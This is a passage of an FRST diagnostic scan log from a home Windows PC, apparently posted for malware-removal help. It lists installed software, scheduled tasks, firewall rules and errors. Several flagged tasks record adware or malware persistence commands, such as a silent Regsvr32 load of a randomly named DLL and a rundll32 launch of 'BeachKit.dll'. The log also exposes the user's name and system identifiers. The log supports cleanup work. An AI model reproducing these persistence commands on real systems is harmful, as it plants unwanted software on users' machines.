Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5139.5005 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Mozilla Firefox 27.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0 (x86 en-US)) (Version: 27.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PdaNet+ for Android 4.12 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
PowerFingers Ch. 1 (HKLM-x32\...\PowerFingers Ch. 1) (Version: - Music Unlimited Inc.)
PrintMaster 12 (HKLM-x32\...\{2A304FDE-F4E3-446D-AA0D-31425C897B71}) (Version: - Broderbund LLC)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{35DB2630-846E-47C5-AF84-9D6AC3629F55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.29004 - Realtek Semiconductor Corp.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
SpeedyBackup (HKLM-x32\...\{6FF10046-D763-4859-A5C7-8AD81B9C8427}) (Version: 5.0.5.0 - SpeedyPC Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
Turbo Lister 2 (HKLM-x32\...\{8927E07C-97F7-4A54-88FB-D976F50DD46E}) (Version: 2.00.0000 - eBay Inc.)
WinALDL (HKLM-x32\...\WinALDL) (Version: - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {05DF4A16-BE01-4E34-A027-CB8165CA61E8} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {0EBA43D3-D7BE-4AE6-9462-F46D199BCC46} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {207BFC61-FFED-4507-8EDD-6AA5AE1C8A47} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2256FEB8-E941-4264-AD41-D3DD3B8E85D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {2391AF7C-19CC-4AED-9222-E7E2F5CF9B9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {24625A46-03C1-4745-AFC8-58F70A4CA83B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2865D75A-9EFF-4BDA-A98B-E2BAFD745E88} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {2A9BA1F7-EAEA-4938-9457-630770B8CA56} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {2F0B453C-7978-474F-B2DD-511436B54629} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {35D93F14-F697-4D00-9872-F3A2EE485306} - System32\Tasks\Beach Kit => Rundll32.exe "C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3
Task: {39E77F7F-3017-488D-B44D-3D34D66F423B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {4141D743-61D5-4790-8B3F-9B77C8B78A87} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {4DB10E48-560F-4E83-A1B5-16CEB0A07A99} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {52CD9B93-F461-41BB-B4D3-375417CBE947} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {5840CBCE-7F77-411E-B033-1C1AF189ADB5} - \1f308483-1a6e-493d-ae8f-5dd8634c5004-4 -> No File <==== ATTENTION
Task: {5888B29F-A4A4-4A01-83F0-070CAD86847C} - System32\Tasks\SpeedyPC Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: {58BFE8A7-F663-453E-8A1F-E93845F9ED7B} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {69480AF7-F603-4EA8-8F93-EA6B8C01E138} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {695CE9AD-D705-4749-BE09-14AD8276A181} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {69872E59-9BA5-40D1-B0BE-ACAFDCCEA4B4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {69960CBC-066B-492F-92D0-642850A25C91} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {7AA2534A-D974-4476-811A-C42210045BF5} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7C7A4D0B-9DDE-4325-B5C5-1EF7F85C990C} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7F064198-2C66-4EA3-8B38-FFFCD6574F3C} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
Task: {8152AE6D-A0D3-41F0-8EEF-5C1CEBACE194} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {84780F38-B4EB-43A1-9629-5DCE4E9AB282} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {86B70693-6EF6-4BC0-B4E4-2BAFCFC8A380} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {886B215D-DE34-41B6-9B36-980D6CD813DA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {89FF84C6-2FF3-4ADC-9311-2162837E1C22} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} - System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\261dc3b1\57c348f3.dll" <==== ATTENTION
Task: {9C4D00C3-36F0-4AD8-AA88-D81BD96CB286} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {A433E40E-B066-4216-A8FB-2E412069CE29} - System32\Tasks\SpeedyBackup Startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B6996A21-76AB-416B-AA92-28E5F3BE2033} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {B7731159-01AA-4BAF-8508-D5D744AB61D2} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {B7F72EBE-9D32-4E20-BDB1-4619D96DE4F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [2011-06-14] (Hewlett-Packard)
Task: {C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> No File <==== ATTENTION
Task: {CA12805D-100F-4DA6-A1C6-C1596CB06EFB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [2011-03-22] (Hewlett-Packard Company)
Task: {CDA7EB4B-1611-4B3F-9BA4-65E0A908AFBC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {D56D93D7-2643-4711-BC5B-EC4D1D134106} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-17] (Adobe Systems Incorporated)
Task: {D6F2BC1F-773E-4624-9FAA-578BE389CD0E} - System32\Tasks\SpeedyBackup reigistration schedule => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E6542D06-DBEF-4690-A07E-F59316EEB423} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {E67B64B5-D8A4-4EEC-A056-719D3EC8D454} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {E6FB393C-54B6-49CD-B343-6854CCC2D2D9} - System32\Tasks\{675E60C1-E04C-4593-80CC-CB005468CE68} => pcalua.exe -a "C:\Program Files (x86)\JZIP\JZIP\Uninstall.exe"
Task: {E730974E-3C79-4045-9280-75EA6B86045D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FA4F0A0E-8234-469C-B0EB-2375D63F521A} - \Inst_Rep -> No File <==== ATTENTION
Task: {FAD76473-D2B8-4544-ACE9-4593FE1CB480} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {FB5B3AE1-116E-45A5-A278-B866156DEE5F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup Startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-29 23:18 - 2015-10-29 23:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2012-02-10 00:01 - 2012-02-10 00:01 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-07-21 08:34 - 2016-06-30 19:27 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-21 08:34 - 2016-06-30 19:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-21 08:34 - 2016-06-30 19:22 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-21 08:34 - 2016-06-30 19:24 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-02 09:45 - 2016-02-02 09:45 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-21 08:38 - 2016-06-30 19:48 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-06 14:05 - 2016-05-06 14:05 - 00093344 _____ () C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupServicePS.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2017-02-10 21:59 - 2017-02-01 01:01 - 01870168 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-10 21:59 - 2017-02-01 01:01 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxps://apps.driversupport.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2016-02-29 07:25 - 00000768 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Randy\Pictures\2013-11-11 mp3 pics\mp3 pics 094.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{5096E3C2-805A-4E88-A4A3-13545B4D1190}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{4A38DA32-F01E-4E5A-BF43-C33E19F602A9}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{72B049A4-A1AD-424F-B207-83EB45FE4FA1}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{C0694437-3E6B-48E6-BAE8-1DD7754607E2}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{8C5854C9-2B87-484B-A7CE-DF5FD39FD80F}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{C1910A3B-1FF1-4A15-BD5C-7B63E54864BA}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{25AC17DB-848F-4C5B-BFA1-EE136038C5B0}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{D82713E1-5DF2-4A9C-89ED-CD6BC635029B}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{05C38E86-D970-43B3-B9E5-CE335017994D}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{B9E57A2A-6FD0-4298-9FDD-48B32A87D5C4}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{AF46B9A0-0569-45DA-B9B7-D8C3BCA025FE}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{9A79DE3D-535B-4630-B408-156475E34583}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{EB084F55-B942-4682-88DB-6148A03F24A3}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [{4B5A63AD-E187-4258-B0D6-7F9854C34707}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [UDP Query User{74C217E7-4A71-4B7C-B1C0-7F4F2A476D6F}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [TCP Query User{51F0DA7E-9ACF-4E1F-AAFE-1D8E388182E7}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [{0A265467-EB47-4D4F-B21E-557F71FBC74D}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{4B048853-1439-4C34-B69F-4F94735906B0}] => LPort=5357
FirewallRules: [{C48CB5AF-96E1-4714-989C-D63918A32561}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\DeviceSetup.exe
FirewallRules: [{BB94FFB5-0DF3-484E-B388-3E742A7E3942}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxPrinterUtility.exe
FirewallRules: [{8D8EA2DE-6C99-4A3D-A12D-12AE07960DA2}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\SendAFax.exe
FirewallRules: [{5FFB78F9-B102-4DA7-9620-3B31FB3D23BE}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\DigitalWizards.exe
FirewallRules: [{EEF9F1BC-D009-4B39-9345-8ABECDD897A8}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxApplications.exe
FirewallRules: [{F65943E6-3AF8-4E73-A7B3-0B0E5F88AA10}] => C:\Users\Randy\AppData\Local\Temp\7zS377E\HP.EasyStart.exe
FirewallRules: [{CE668E86-3CBC-4A89-B046-A191EFF34DD8}] => C:\Windows\system32\rundll32.exe
FirewallRules: [UDP Query User{EE1005F2-20B4-4EFC-B3FE-C75EFC07FF0A}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{8CC323F6-7013-42FF-8CCD-45648B4D4B69}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{2DFAFEAB-B453-4575-9717-0A2B673A57B5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{2A79706E-F012-45D5-BE8E-0AFE79CA93C5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{B7892689-DB82-4260-92E6-93E162A44F5E}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{96A65B45-9398-4660-8E2F-AB4CE5ACDF84}] => C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{5D1CEFBA-B681-47A8-ADE4-DDD97410D510}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-08-2016 22:31:58 RegCure Pro Backup
12-11-2016 19:33:46 Windows Update
12-11-2016 19:35:27 Windows Update
11-02-2017 14:46:35 Removed Itibiti RTC

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (02/11/2017 06:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10586.494, time stamp: 0x5775e94c
Faulting module name: StartUI.dll, version: 10.0.10586.494, time stamp: 0x5775e851
Exception code: 0xc000041d
Fault offset: 0x00000000002990c8
Faulting process id: 0x164c
Faulting application start time: 0x01d284d68cb9af7b
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Faulting module path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\StartUI.dll
Report Id: d71a9e05-9bd3-4b5b-a994-de7e7c001d4d
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App

Error: (02/11/2017 06:34:19 PM) (Source: Application Error) (EventID: 1000) (User: )
